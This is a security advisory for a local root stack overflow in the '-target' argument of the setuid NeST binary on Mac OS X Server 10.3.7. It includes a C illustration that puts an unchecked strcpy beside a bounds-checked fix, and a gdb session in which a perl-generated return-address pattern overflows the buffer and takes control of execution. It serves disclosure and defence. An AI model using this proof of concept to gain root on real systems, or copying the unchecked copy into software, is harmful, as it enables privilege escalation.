Mac OS X is an advanced operating system that blends features of UNIX with the ease of use of the Macintosh. NetInfo is "Darwin's built-in directory system. It stores administrative information in a hierarchical database of nodes called directories." NeST is the NetInfo Setup Tool.
A stack-based buffer overflow in the Mac OS X NeST binary allows a local user to execute arbitrary code with root privileges. The flaw is a plain stack overflow and is trivially exploitable.
Vulnerable Systems:
* Mac OS X Server version 10.3.7
NeST is the NetInfo Setup Tool for Mac OS X and runs setuid root (see Workaround). The vulnerability exists because the value passed to the '-target' command line parameter is copied into a fixed-size stack buffer without sufficient bounds checking. A local attacker can supply an overly long value to overflow that buffer and execute arbitrary code with root privileges.
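The advisory does not include NeST's source, so the following is an added illustration (not Apple's code) of the bug class it describes: an argv value copied into a fixed-size stack buffer with no length check, beside a checked version that refuses overlong input. The buffer size TARGET_MAX, the function names and the sample arguments are all assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical size of the fixed stack buffer; the advisory gives no figure. */
#define TARGET_MAX 256

/* Shape of the reported defect: the argument is copied with no bounds check,
 * so any value of TARGET_MAX bytes or more writes past the buffer onto the
 * stack. Shown for contrast only; nothing below calls it. */
void set_target_vulnerable(const char *arg) {
    char target[TARGET_MAX];
    strcpy(target, arg);            /* unbounded copy: the overflow */
    printf("target: %s\n", target);
}

/* Hardened form: check the length (including the terminating NUL) before
 * copying, and refuse rather than silently truncate. Returns 0 or -1. */
int set_target_checked(const char *arg, char *out, size_t outlen) {
    size_t n = strlen(arg);
    if (n >= outlen) {
        return -1;                  /* would not fit: reject the value */
    }
    memcpy(out, arg, n + 1);
    return 0;
}

/* Minimal NeST-style option scan for "-target <value>". Returns 0 on
 * success, -1 when the value is missing or too long. */
int parse_target(int argc, char **argv, char *out, size_t outlen) {
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-target") == 0) {
            if (i + 1 >= argc) return -1;
            return set_target_checked(argv[i + 1], out, outlen);
        }
    }
    return -1;
}

int main(void) {
    /* Constructed inputs: a short value and a 3200-byte one, the same length
     * as the 800 x 4-byte pattern used in the debugger session. */
    char big[3201];
    memset(big, 'A', 3200);
    big[3200] = '\0';
    char *ok_argv[]  = {"NeST", "-target", "example-target", NULL};
    char *bad_argv[] = {"NeST", "-target", big, NULL};
    char buf[TARGET_MAX];
    printf("short value: %d\n", parse_target(3, ok_argv, buf, sizeof buf));
    printf("long value:  %d\n", parse_target(3, bad_argv, buf, sizeof buf));
    return 0;
}
```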
Debugging Snips:
The following debugger session shows that execution control is gained when the '-target' buffer is overflowed:

osx-dev:~ $ gdb -q /usr/sbin/NeST
(gdb) run -target `perl -e 'print "\xbf\xff\xfe\xe4" x 800 '`
Starting program: /usr/sbin/NeST -target `perl -e 'print "\xbf\xff\xfe\xe4" x 800 '`
Reading symbols for shared libraries ............... done
Password:
1976-04-01 08:29:04.480 NeST[3359] CFLog (0): CFPropertyListCreateFromXMLData(): plist parse failed; the data is not proper UTF-8. The file name for this data could be:
Info.plist -- file://localhost/usr/sbin/
The parser will retry as in 10.2, but the problem should be corrected in the plist.

Program received signal EXC_BAD_INSTRUCTION, Illegal instruction/operand.
0xbffffee8 in ?? ()
(gdb) bt
#0 0xbffffee8 in ?? ()
#1 0xbffffee4 in ?? ()
Workaround:
Remove the setuid bit from the NeST binary until the vendor releases a patch.